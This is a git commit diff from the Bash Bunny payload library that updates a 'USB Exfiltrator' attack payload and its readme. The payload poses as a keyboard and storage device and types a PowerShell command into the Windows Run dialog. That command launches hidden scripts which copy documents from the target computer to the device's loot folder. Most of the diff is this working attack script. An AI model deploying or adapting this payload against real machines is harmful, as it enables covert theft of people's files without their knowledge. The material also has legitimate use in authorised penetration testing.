Updated USB Exfiltrator payload for Bash Bunny v1.1

2025-10-29 16:58:25 +00:00 · 2017-04-07 16:30:44 +10:00 · 2017-04-07 16:30:44 +10:00 · 4ce2b50cb2
commit 4ce2b50cb2
parent d8ab0ac587
2 changed files with 15 additions and 19 deletions
--- a/payloads/library/usb_exfiltrator/payload.txt
+++ b/payloads/library/usb_exfiltrator/payload.txt
@ -1,23 +1,18 @@
 #!/bin/bash
 #
-# Title:         USB Exfiltration
+# Title:         USB Exfiltrator
 # Author:        Hak5Darren
-# Version:       1.0
+# Version:       1.1
 # Target:        Windows XP SP3+
 # Props:         Diggster, IMcPwn
+# Category:      Exfiltration
 # 
 # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
 # which in turn executes e.cmd invisibly using i.vbs
 # which in turn copies documents to the loot folder on the Bash Bunny.
 #

-# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
-source bunny_helpers.sh
-
-LED R
+LED ATTACK
 ATTACKMODE HID STORAGE
-QUACK GUI r
-QUACK DELAY 100
-QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
-QUACK ENTER
-LED G
+RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
+LED FINISH
--- a/payloads/library/usb_exfiltrator/readme.md
+++ b/payloads/library/usb_exfiltrator/readme.md
@ -1,8 +1,11 @@
 # Exfiltrator for Bash Bunnys

-* Author: Hak5Darren
-* Version: Version 1.1
-* Target: Windows
+- Title:         USB Exfiltrator
+- Author:        Hak5Darren
+- Version:       1.1
+- Target:        Windows XP SP3+
+- Props:         Diggster, IMcPwn
+- Category:      Exfiltration

 ## Description

@ -15,11 +18,9 @@ By default the staged payload exfiltrates PDF files. Change the xcopy commands f

 ## STATUS

-| LED                | Status                                       |
-| ------------------ | -------------------------------------------- |
-| White (blinking)   | Setup Failed. Target didn't obtain IP        |
-| Red                | Attack Setup                                 |
-| Green              | Attack Complete                              |
+| LED      | Status       |
+| -------- | ------------ |
+| ATTACK   | Attacking :) |

 ## Discussion
 [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40225-payload-usb_exfiltrator/ "Hak5 Forum Thread")